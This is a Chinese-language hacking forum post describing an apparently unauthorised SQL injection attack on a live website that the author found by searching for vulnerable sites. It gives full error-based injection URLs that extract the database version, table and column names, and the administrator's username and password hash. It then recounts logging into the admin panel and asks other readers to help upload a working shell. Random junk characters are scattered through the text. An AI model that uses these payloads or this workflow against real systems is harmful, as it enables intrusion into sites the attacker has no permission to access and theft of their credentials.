近一直在学习数据库方面的知识,一直在钻研PHP的一些高级注入语法,感觉比较的有意思。于是就在网上找有洞的网站练习手注。于是有了下文。% h) G# Z' ~3 p. c6 F
首先找到网站后台,加了个admin,后台出来了 & a& c' O/ F0 B- [4 K4 e, T
7 L( j( z" d. t) b X# `# S
& t4 ]8 e2 {, R+ j+ W- j然后看了下网站,发现貌似都是html静态网页,但是通过图片链接发现应该是伪静态,于是在后面加了个 ',报错了,初步判断可以注入* }, u) Q) d% E. g
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145843714.jpg 从报错语句中我们可以判断出存在frame_board_conference 表,知道存在frame_board_conference,可以方便我们后面的注入。这里我用的是错误回显注入。 首先查下数据库相关信息。 www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*) from+frame_board_conference+group+by+concat(0x3a,concat(0x3a,database(),0x3a,version()),floor(rand(0)*2)))—
' y/ C6 t7 g: ?2 g: q
; C% q9 {+ K ]0 u/ a9 x: }$ F: x* Q/ z( r4 d- Y x. O0 T
! z* J. P0 E) p( Q; o0 ]5 n
, N; S! p, }( u8 t& @' |6 Z& k$ Qhttp://www.myhack58.com/Article/UploadPic/2012-12/20121218145846722.jpg9 W9 s$ ?3 H& `$ W( L
7 q8 s) R: B# t6 ]; K
$ s3 _ b* z( T( H3 d- _, K$ w/ Z$ \0 h( V4 W( j( I6 ]; m
# C4 W# u6 |# g1 j! M) x8 m0 u. C可以看到数据库版本为5.0.32,存在information_schema表,可以进一步的注入。 然后我们查表 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(table_name),1,150)from+information_schema.tables+where+table_schema=database()),0x3a,floor(rand(0)*2)))-- 得到管理员表段frame_administrator" w/ q1 e. z% a7 b1 V. j
) K2 Q; v# S, v! ]
$ D0 r2 K; x) j9 O2 Q
http://www.myhack58.com/Article/UploadPic/2012-12/20121218145846695.jpg
) g% G; Z1 w j5 l& q! U( Z; E5 V* a8 g+ r2 Q3 G- Z
$ s, Q* j$ g$ Z* W$ B, ~" Q 查字段 http://www.xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(column_name),1,150)from+information_schema.columns+where+table_name=0x6672616d655f61646d696e6973747261746f72),0x3a,floor(rand(0)*2)))--
}; \6 U6 m, Q: ^, h9 P2 P" k/ J9 n
1 D* d# V- Q4 q2 V' F# j- F, R" n' S5 q& V# Y: @+ ]
得到userID,userPass字段 最后 http://xxx/modules/board/bd_view.html?id=conference&no=67+and+(select+count(*)+from+frame_board_conference+group+by+concat(0x3a,(select+substr(group_concat(userID,0x3a,userPass,0x0a),1,150)from+frame_administrator),0x3a,floor(rand(0)*2)))--' d$ a, R( v. a0 {
! C, L" r; L3 J* f# U( ~ s+ @2 L
$ E. k2 n& R" c6 b+ T8 q5 g5 ?" _ n
- n3 Q y, T: B$ a 得到最终结果admin eb0a191797624dd3a48fa681d3061212 解密后成功进入后台,但是在获得shell的过程中出了点问题,可以穿php但是貌似无法解析,不知道什么原因,本人很菜,在这里希望大牛有兴趣的话帮忙拿下shell,感激不尽。Pm我,我把网址发给你。 |